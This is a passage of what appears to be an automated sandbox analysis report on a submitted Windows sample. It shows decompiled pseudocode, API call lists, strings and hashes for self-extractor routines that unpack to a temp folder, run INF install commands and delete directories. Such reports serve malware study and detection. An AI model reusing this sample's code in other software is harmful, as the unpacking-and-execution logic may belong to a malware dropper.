                                                                                                                                                                                                                                                  • Part of subcall function 010E44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 010E4518
                                                                                                                                                                                                                                                  • Part of subcall function 010E44B9: MessageBoxA.USER32(?,?,lenta,00010010), ref: 010E4554
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: String$PrivateProfile$AllocAttributesCompareFileLoadLocalMessageNamePathShort
                                                                                                                                                                                                                                                • String ID: "$.BAT$.INF$AdvancedINF$C:\Users\user\AppData\Local\Temp\IXP003.TMP\$Command.com /c %s$DefaultInstall$Reboot$Version$rundll32.exe %s,InstallHinfSection %s 128 %s$setupapi.dll$setupx.dll
                                                                                                                                                                                                                                                • API String ID: 383838535-3401884814
                                                                                                                                                                                                                                                • Opcode ID: 3b80c06f1d5a363de6466a93875ad2c26c30bfa232a30638bc829bbbbcca35f7
                                                                                                                                                                                                                                                • Instruction ID: 654b32289aa80ccd444a7e66062c3992cce5bb03941d03d4b986cd8a240a810c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3b80c06f1d5a363de6466a93875ad2c26c30bfa232a30638bc829bbbbcca35f7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F1A16A70A042085FEF60AB2ACC4CBEA77E9EB95710F1442D9E5D5A72C0DBB18E85CB50
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 010E2F1D Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 120libraryfileloaderCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 406 10e2f1d-10e2f3d 407 10e2f3f-10e2f46 406->407 408 10e2f6c-10e2f73 call 10e5164 406->408 410 10e2f5f-10e2f66 call 10e3a3f 407->410 411 10e2f48 call 10e51e5 407->411 416 10e2f79-10e2f80 call 10e55a0 408->416 417 10e3041 408->417 410->408 410->417 418 10e2f4d-10e2f4f 411->418 416->417 424 10e2f86-10e2fbe GetSystemDirectoryA call 10e658a LoadLibraryA 416->424 420 10e3043-10e3053 call 10e6ce0 417->420 418->417 421 10e2f55-10e2f5d 418->421 421->408 421->410 428 10e2ff7-10e3004 FreeLibrary 424->428 429 10e2fc0-10e2fd4 GetProcAddress 424->429 430 10e3006-10e300c 428->430 431 10e3017-10e3024 SetCurrentDirectoryA 428->431 429->428 432 10e2fd6-10e2fee DecryptFileA 429->432 430->431 433 10e300e call 10e621e 430->433 434 10e3026-10e303c call 10e44b9 call 10e6285 431->434 435 10e3054-10e305a 431->435 432->428 441 10e2ff0-10e2ff5 432->441 445 10e3013-10e3015 433->445 434->417 436 10e305c call 10e3b26 435->436 437 10e3065-10e306c 435->437 447 10e3061-10e3063 436->447 443 10e306e-10e3075 call 10e256d 437->443 444 10e307c-10e3089 437->444 441->428 452 10e307a 443->452 449 10e308b-10e3091 444->449 450 10e30a1-10e30a9 444->450 445->417 445->431 447->417 447->437 449->450 453 10e3093 call 10e3ba2 449->453 455 10e30ab-10e30ad 450->455 456 10e30b4-10e30b7 450->456 452->444 460 10e3098-10e309a 453->460 455->456 457 10e30af call 10e4169 455->457 456->420 457->456 460->417 461 10e309c 460->461 461->450
                                                                                                                                                                                                                                                C-Code - Quality: 82%
                                                                                                                                                                                                                                                			E010E2F1D(void* __ecx, int __edx) {
				signed int _v8;
				char _v272;
				_Unknown_base(*)()* _v276;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t9;
				void* _t11;
				struct HWND__* _t12;
				void* _t14;
				int _t21;
				signed int _t22;
				signed int _t25;
				intOrPtr* _t26;
				signed int _t27;
				void* _t30;
				_Unknown_base(*)()* _t31;
				void* _t34;
				struct HINSTANCE__* _t36;
				intOrPtr _t41;
				intOrPtr* _t44;
				signed int _t46;
				int _t47;
				void* _t58;
				void* _t59;

				_t43 = __edx;
				_t9 =  *0x10e8004; // 0x71a8563c
				_v8 = _t9 ^ _t46;
				if( *0x10e8a38 != 0) {
					L5:
					_t11 = E010E5164(_t52);
					_t53 = _t11;
					if(_t11 == 0) {
						L16:
						_t12 = 0;
						L17:
						return E010E6CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
					}
					_t14 = E010E55A0(_t53); // executed
					if(_t14 == 0) {
						goto L16;
					} else {
						_t45 = 0x105;
						GetSystemDirectoryA( &_v272, 0x105);
						_t43 = 0x105;
						_t40 =  &_v272;
						E010E658A( &_v272, 0x105, "advapi32.dll");
						_t36 = LoadLibraryA( &_v272);
						_t44 = 0;
						if(_t36 != 0) {
							_t31 = GetProcAddress(_t36, "DecryptFileA");
							_v276 = _t31;
							if(_t31 != 0) {
								_t45 = _t47;
								_t40 = _t31;
								 *0x10ea288("C:\Users\hardz\AppData\Local\Temp\IXP003.TMP\", 0); // executed
								_v276();
								if(_t47 != _t47) {
									_t40 = 4;
									asm("int 0x29");
								}
							}
						}
						FreeLibrary(_t36);
						_t58 =  *0x10e8a24 - _t44; // 0x0
						if(_t58 != 0) {
							L14:
							_t21 = SetCurrentDirectoryA("C:\Users\hardz\AppData\Local\Temp\IXP003.TMP\"); // executed
							if(_t21 != 0) {
								__eflags =  *0x10e8a2c - _t44; // 0x0
								if(__eflags != 0) {
									L20:
									__eflags =  *0x10e8d48 & 0x000000c0;
									if(( *0x10e8d48 & 0x000000c0) == 0) {
										_t41 =  *0x10e9a40; // 0x3, executed
										_t26 = E010E256D(_t41); // executed
										_t44 = _t26;
									}
									_t22 =  *0x10e8a24; // 0x0
									 *0x10e9a44 = _t44;
									__eflags = _t22;
									if(_t22 != 0) {
										L26:
										__eflags =  *0x10e8a38;
										if( *0x10e8a38 == 0) {
											__eflags = _t22;
											if(__eflags == 0) {
												E010E4169(__eflags);
											}
										}
										_t12 = 1;
										goto L17;
									} else {
										__eflags =  *0x10e9a30 - _t22; // 0x0
										if(__eflags != 0) {
											goto L26;
										}
										_t25 = E010E3BA2(); // executed
										__eflags = _t25;
										if(_t25 == 0) {
											goto L16;
										}
										_t22 =  *0x10e8a24; // 0x0
										goto L26;
									}
								}
								_t27 = E010E3B26(_t40, _t44);
								__eflags = _t27;
								if(_t27 == 0) {
									goto L16;
								}
								goto L20;
							}
							_t43 = 0x4bc;
							E010E44B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
							 *0x10e9124 = E010E6285();
							goto L16;
						}
						_t59 =  *0x10e9a30 - _t44; // 0x0
						if(_t59 != 0) {
							goto L14;
						}
						_t30 = E010E621E(); // executed
						if(_t30 == 0) {
							goto L16;
						}
						goto L14;
					}
				}
				_t49 =  *0x10e8a24;
				if( *0x10e8a24 != 0) {
					L4:
					_t34 = E010E3A3F(_t51);
					_t52 = _t34;
					if(_t34 == 0) {
						goto L16;
					}
					goto L5;
				}
				if(E010E51E5(_t49) == 0) {
					goto L16;
				}
				_t51 =  *0x10e8a38;
				if( *0x10e8a38 != 0) {
					goto L5;
				}
				goto L4;
			}




























                                                                                                                                                                                                                                                0x010e2f1d
                                                                                                                                                                                                                                                0x010e2f28
                                                                                                                                                                                                                                                0x010e2f2f
                                                                                                                                                                                                                                                0x010e2f3d
                                                                                                                                                                                                                                                0x010e2f6c
                                                                                                                                                                                                                                                0x010e2f6c
                                                                                                                                                                                                                                                0x010e2f71
                                                                                                                                                                                                                                                0x010e2f73
                                                                                                                                                                                                                                                0x010e3041
                                                                                                                                                                                                                                                0x010e3041
                                                                                                                                                                                                                                                0x010e3043
                                                                                                                                                                                                                                                0x010e3053
                                                                                                                                                                                                                                                0x010e3053
                                                                                                                                                                                                                                                0x010e2f79
                                                                                                                                                                                                                                                0x010e2f80
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e2f86
                                                                                                                                                                                                                                                0x010e2f86
                                                                                                                                                                                                                                                0x010e2f93
                                                                                                                                                                                                                                                0x010e2f9e
                                                                                                                                                                                                                                                0x010e2fa0
                                                                                                                                                                                                                                                0x010e2fa6
                                                                                                                                                                                                                                                0x010e2fb8
                                                                                                                                                                                                                                                0x010e2fba
                                                                                                                                                                                                                                                0x010e2fbe
                                                                                                                                                                                                                                                0x010e2fc6
                                                                                                                                                                                                                                                0x010e2fcc
                                                                                                                                                                                                                                                0x010e2fd4
                                                                                                                                                                                                                                                0x010e2fd6
                                                                                                                                                                                                                                                0x010e2fd8
                                                                                                                                                                                                                                                0x010e2fe0
                                                                                                                                                                                                                                                0x010e2fe6
                                                                                                                                                                                                                                                0x010e2fee
                                                                                                                                                                                                                                                0x010e2ff0
                                                                                                                                                                                                                                                0x010e2ff5
                                                                                                                                                                                                                                                0x010e2ff5
                                                                                                                                                                                                                                                0x010e2fee
                                                                                                                                                                                                                                                0x010e2fd4
                                                                                                                                                                                                                                                0x010e2ff8
                                                                                                                                                                                                                                                0x010e2ffe
                                                                                                                                                                                                                                                0x010e3004
                                                                                                                                                                                                                                                0x010e3017
                                                                                                                                                                                                                                                0x010e301c
                                                                                                                                                                                                                                                0x010e3024
                                                                                                                                                                                                                                                0x010e3054
                                                                                                                                                                                                                                                0x010e305a
                                                                                                                                                                                                                                                0x010e3065
                                                                                                                                                                                                                                                0x010e3065
                                                                                                                                                                                                                                                0x010e306c
                                                                                                                                                                                                                                                0x010e306e
                                                                                                                                                                                                                                                0x010e3075
                                                                                                                                                                                                                                                0x010e307a
                                                                                                                                                                                                                                                0x010e307a
                                                                                                                                                                                                                                                0x010e307c
                                                                                                                                                                                                                                                0x010e3081
                                                                                                                                                                                                                                                0x010e3087
                                                                                                                                                                                                                                                0x010e3089
                                                                                                                                                                                                                                                0x010e30a1
                                                                                                                                                                                                                                                0x010e30a1
                                                                                                                                                                                                                                                0x010e30a9
                                                                                                                                                                                                                                                0x010e30ab
                                                                                                                                                                                                                                                0x010e30ad
                                                                                                                                                                                                                                                0x010e30af
                                                                                                                                                                                                                                                0x010e30af
                                                                                                                                                                                                                                                0x010e30ad
                                                                                                                                                                                                                                                0x010e30b6
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e308b
                                                                                                                                                                                                                                                0x010e308b
                                                                                                                                                                                                                                                0x010e3091
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e3093
                                                                                                                                                                                                                                                0x010e3098
                                                                                                                                                                                                                                                0x010e309a
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e309c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e309c
                                                                                                                                                                                                                                                0x010e3089
                                                                                                                                                                                                                                                0x010e305c
                                                                                                                                                                                                                                                0x010e3061
                                                                                                                                                                                                                                                0x010e3063
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e3063
                                                                                                                                                                                                                                                0x010e302b
                                                                                                                                                                                                                                                0x010e3032
                                                                                                                                                                                                                                                0x010e303c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e303c
                                                                                                                                                                                                                                                0x010e3006
                                                                                                                                                                                                                                                0x010e300c
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e300e
                                                                                                                                                                                                                                                0x010e3015
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e3015
                                                                                                                                                                                                                                                0x010e2f80
                                                                                                                                                                                                                                                0x010e2f3f
                                                                                                                                                                                                                                                0x010e2f46
                                                                                                                                                                                                                                                0x010e2f5f
                                                                                                                                                                                                                                                0x010e2f5f
                                                                                                                                                                                                                                                0x010e2f64
                                                                                                                                                                                                                                                0x010e2f66
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e2f66
                                                                                                                                                                                                                                                0x010e2f4f
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e2f55
                                                                                                                                                                                                                                                0x010e2f5d
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetSystemDirectoryA.KERNEL32 ref: 010E2F93
                                                                                                                                                                                                                                                • LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 010E2FB2
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 010E2FC6
                                                                                                                                                                                                                                                • DecryptFileA.ADVAPI32 ref: 010E2FE6
                                                                                                                                                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 010E2FF8
                                                                                                                                                                                                                                                • SetCurrentDirectoryA.KERNELBASE(C:\Users\user\AppData\Local\Temp\IXP003.TMP\), ref: 010E301C
                                                                                                                                                                                                                                                  • Part of subcall function 010E51E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,010E2F4D,?,00000002,00000000), ref: 010E5201
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                                                                                                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$DecryptFileA$advapi32.dll
                                                                                                                                                                                                                                                • API String ID: 2126469477-3395714304
                                                                                                                                                                                                                                                • Opcode ID: c06c194b0d319ca05f59e715d46fc9f291c5f9877d168f1c1dcaa292b5ab5e24
                                                                                                                                                                                                                                                • Instruction ID: 853da6c4a40e4634c7ab7976031a0ba841307db3622d0450f6a708e4c794cb28
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c06c194b0d319ca05f59e715d46fc9f291c5f9877d168f1c1dcaa292b5ab5e24
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9B41DA31A002058EEB71AB3B9D5C69A3FE8BB54B54F0440A9FAD1CF145EB7AC980CB50
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 010E2390 Relevance: 12.1, APIs: 8, Instructions: 93filestringCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                C-Code - Quality: 86%
                                                                                                                                                                                                                                                			E010E2390(CHAR* __ecx) {
				signed int _v8;
				char _v276;
				char _v280;
				char _v284;
				struct _WIN32_FIND_DATAA _v596;
				struct _WIN32_FIND_DATAA _v604;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				int _t36;
				void* _t46;
				void* _t62;
				void* _t63;
				CHAR* _t65;
				void* _t66;
				signed int _t67;
				signed int _t69;

				_t69 = (_t67 & 0xfffffff8) - 0x254;
				_t21 =  *0x10e8004; // 0x71a8563c
				_t22 = _t21 ^ _t69;
				_v8 = _t21 ^ _t69;
				_t65 = __ecx;
				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
					L10:
					_pop(_t62);
					_pop(_t66);
					_pop(_t46);
					return E010E6CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
				} else {
					E010E1680( &_v276, 0x104, __ecx);
					_t58 = 0x104;
					E010E16B3( &_v280, 0x104, "*");
					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
					_t63 = _t22;
					if(_t63 == 0xffffffff) {
						goto L10;
					} else {
						goto L3;
					}
					do {
						L3:
						_t58 = 0x104;
						E010E1680( &_v276, 0x104, _t65);
						if((_v604.ftCreationTime & 0x00000010) == 0) {
							_t58 = 0x104;
							E010E16B3( &_v276, 0x104,  &(_v596.dwReserved1));
							SetFileAttributesA( &_v280, 0x80);
							DeleteFileA( &_v280);
						} else {
							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
								E010E16B3( &_v276, 0x104,  &(_v596.cFileName));
								_t58 = 0x104;
								E010E658A( &_v280, 0x104, 0x10e1140);
								E010E2390( &_v284);
							}
						}
						_t36 = FindNextFileA(_t63,  &_v596); // executed
					} while (_t36 != 0);
					FindClose(_t63); // executed
					_t22 = RemoveDirectoryA(_t65); // executed
					goto L10;
				}
			}





















                                                                                                                                                                                                                                                0x010e2398
                                                                                                                                                                                                                                                0x010e239e
                                                                                                                                                                                                                                                0x010e23a3
                                                                                                                                                                                                                                                0x010e23a5
                                                                                                                                                                                                                                                0x010e23ae
                                                                                                                                                                                                                                                0x010e23b3
                                                                                                                                                                                                                                                0x010e24cb
                                                                                                                                                                                                                                                0x010e24d2
                                                                                                                                                                                                                                                0x010e24d3
                                                                                                                                                                                                                                                0x010e24d4
                                                                                                                                                                                                                                                0x010e24df
                                                                                                                                                                                                                                                0x010e23c2
                                                                                                                                                                                                                                                0x010e23d1
                                                                                                                                                                                                                                                0x010e23db
                                                                                                                                                                                                                                                0x010e23e4
                                                                                                                                                                                                                                                0x010e23f6
                                                                                                                                                                                                                                                0x010e23fc
                                                                                                                                                                                                                                                0x010e2401
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e2407
                                                                                                                                                                                                                                                0x010e2407
                                                                                                                                                                                                                                                0x010e2408
                                                                                                                                                                                                                                                0x010e2411
                                                                                                                                                                                                                                                0x010e241f
                                                                                                                                                                                                                                                0x010e247a
                                                                                                                                                                                                                                                0x010e2483
                                                                                                                                                                                                                                                0x010e2495
                                                                                                                                                                                                                                                0x010e24a3
                                                                                                                                                                                                                                                0x010e2421
                                                                                                                                                                                                                                                0x010e242f
                                                                                                                                                                                                                                                0x010e2453
                                                                                                                                                                                                                                                0x010e245d
                                                                                                                                                                                                                                                0x010e2466
                                                                                                                                                                                                                                                0x010e2472
                                                                                                                                                                                                                                                0x010e2472
                                                                                                                                                                                                                                                0x010e242f
                                                                                                                                                                                                                                                0x010e24af
                                                                                                                                                                                                                                                0x010e24b5
                                                                                                                                                                                                                                                0x010e24be
                                                                                                                                                                                                                                                0x010e24c5
                                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                                0x010e24c5

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • FindFirstFileA.KERNELBASE(?,010E8A3A,010E11F4,010E8A3A,00000000,?,?), ref: 010E23F6
                                                                                                                                                                                                                                                • lstrcmpA.KERNEL32(?,010E11F8), ref: 010E2427
                                                                                                                                                                                                                                                • lstrcmpA.KERNEL32(?,010E11FC), ref: 010E243B
                                                                                                                                                                                                                                                • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 010E2495
                                                                                                                                                                                                                                                • DeleteFileA.KERNEL32(?), ref: 010E24A3
                                                                                                                                                                                                                                                • FindNextFileA.KERNELBASE(00000000,00000010), ref: 010E24AF
                                                                                                                                                                                                                                                • FindClose.KERNELBASE(00000000), ref: 010E24BE
                                                                                                                                                                                                                                                • RemoveDirectoryA.KERNELBASE(010E8A3A), ref: 010E24C5
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 836429354-0
                                                                                                                                                                                                                                                • Opcode ID: 531053fb93c78579198812fe796480c4181b047cb8c695d6a26e6161e3fc714d
                                                                                                                                                                                                                                                • Instruction ID: f3b24f1195a857144386457aedbe47beda473108b88a30a1147442ca3bf8cf12
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 531053fb93c78579198812fe796480c4181b047cb8c695d6a26e6161e3fc714d
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C331A1723046409FD330EAA6CC8DAEB77ECAFC8701F04492DA5D58B140EF3899098B52
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 010E2BFB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 63libraryloaderCOMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 70%
                                                                                                                                                                                                                                                			E010E2BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				long _t4;
				void* _t6;
				intOrPtr _t7;
				void* _t9;
				struct HINSTANCE__* _t12;
				intOrPtr* _t17;
				signed char _t19;
				intOrPtr* _t21;
				void* _t22;
				void* _t24;
				intOrPtr _t32;

				_t4 = GetVersion();
				if(_t4 >= 0 && _t4 >= 6) {
					_t12 = GetModuleHandleW(L"Kernel32.dll");
					if(_t12 != 0) {
						_t21 = GetProcAddress(_t12, "HeapSetInformation");
						if(_t21 != 0) {
							_t17 = _t21;
							 *0x10ea288(0, 1, 0, 0);
							 *_t21();
							_t29 = _t24 - _t24;
							if(_t24 != _t24) {
								_t17 = 4;
								asm("int 0x29");
							}
						}
					}
				}
				_t20 = _a12;
				_t18 = _a4;
				 *0x10e9124 = 0;
				if(E010E2CAA(_a4, _a12, _t29, _t17) != 0) {
					_t9 = E010E2F1D(_t18, _t20); // executed
					_t22 = _t9; // executed
					E010E52B6(0, _t18, _t21, _t22); // executed
					if(_t22 != 0) {
						_t32 =  *0x10e8a3a; // 0x0
						if(_t32 == 0) {
							_t19 =  *0x10e9a2c; // 0x0
							if((_t19 & 0x00000001) != 0) {
								E010E1F90(_t19, _t21, _t22);
							}
						}
					}
				}
				_t6 =  *0x10e8588; // 0x0
				if(_t6 != 0) {
					CloseHandle(_t6);
				}
				_t7 =  *0x10e9124; // 0x0
				return _t7;
			}


















                                                                                                                                                                                                                                                0x010e2c03
                                                                                                                                                                                                                                                0x010e2c0d
                                                                                                                                                                                                                                                0x010e2c18
                                                                                                                                                                                                                                                0x010e2c20
                                                                                                                                                                                                                                                0x010e2c2e
                                                                                                                                                                                                                                                0x010e2c32
                                                                                                                                                                                                                                                0x010e2c36
                                                                                                                                                                                                                                                0x010e2c3d
                                                                                                                                                                                                                                                0x010e2c43
                                                                                                                                                                                                                                                0x010e2c45
                                                                                                                                                                                                                                                0x010e2c47
                                                                                                                                                                                                                                                0x010e2c49
                                                                                                                                                                                                                                                0x010e2c4e
                                                                                                                                                                                                                                                0x010e2c4e
                                                                                                                                                                                                                                                0x010e2c47
                                                                                                                                                                                                                                                0x010e2c32
                                                                                                                                                                                                                                                0x010e2c20
                                                                                                                                                                                                                                                0x010e2c50
                                                                                                                                                                                                                                                0x010e2c54
                                                                                                                                                                                                                                                0x010e2c57
                                                                                                                                                                                                                                                0x010e2c64
                                                                                                                                                                                                                                                0x010e2c66
                                                                                                                                                                                                                                                0x010e2c6b
                                                                                                                                                                                                                                                0x010e2c6d
                                                                                                                                                                                                                                                0x010e2c74
                                                                                                                                                                                                                                                0x010e2c76
                                                                                                                                                                                                                                                0x010e2c7c
                                                                                                                                                                                                                                                0x010e2c7e
                                                                                                                                                                                                                                                0x010e2c87
                                                                                                                                                                                                                                                0x010e2c89
                                                                                                                                                                                                                                                0x010e2c89
                                                                                                                                                                                                                                                0x010e2c87
                                                                                                                                                                                                                                                0x010e2c7c
                                                                                                                                                                                                                                                0x010e2c74
                                                                                                                                                                                                                                                0x010e2c8e
                                                                                                                                                                                                                                                0x010e2c95
                                                                                                                                                                                                                                                0x010e2c98
                                                                                                                                                                                                                                                0x010e2c98
                                                                                                                                                                                                                                                0x010e2c9e
                                                                                                                                                                                                                                                0x010e2ca7

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetVersion.KERNEL32(?,00000002,00000000,?,010E6BB0,010E0000,00000000,00000002,0000000A), ref: 010E2C03
                                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(Kernel32.dll,?,010E6BB0,010E0000,00000000,00000002,0000000A), ref: 010E2C18
                                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 010E2C28
                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,?,010E6BB0,010E0000,00000000,00000002,0000000A), ref: 010E2C98
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 00000003.00000002.375753311.00000000010E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 010E0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375741430.00000000010E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375787045.00000000010E8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 00000003.00000002.375800762.00000000010EC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_3_2_10e0000_gOk22TE.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Handle$AddressCloseModuleProcVersion
                                                                                                                                                                                                                                                • String ID: HeapSetInformation$Kernel32.dll
                                                                                                                                                                                                                                                • API String ID: 62482547-3460614246
                                                                                                                                                                                                                                                • Opcode ID: ffd37f8d9d7ac43b81733c5afff126f1b58dfa10c66c56bfea9208dd71540d71
                                                                                                                                                                                                                                                • Instruction ID: 1d48701aa665d387c2c3b06bbc4c3469eee0372eae773036b035d141fab33b34
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ffd37f8d9d7ac43b81733c5afff126f1b58dfa10c66c56bfea9208dd71540d71
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 901106713002099FE7346BFBEC4CA6B3FDD9B88B94B040059FAC0DB244CA3AE8518760
                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                Function 010E6F40 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                                                                			E010E6F40() {

				SetUnhandledExceptionFilter(E010E6EF0); // executed
				return 0;
			}



                                                                                                                                                                                                                                                0x010e6f45
                                                                                                                                                                                                                                                0x010e6f4d

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 010E6F45
                                                                                                                                                                                                                                                Memory Dump Source
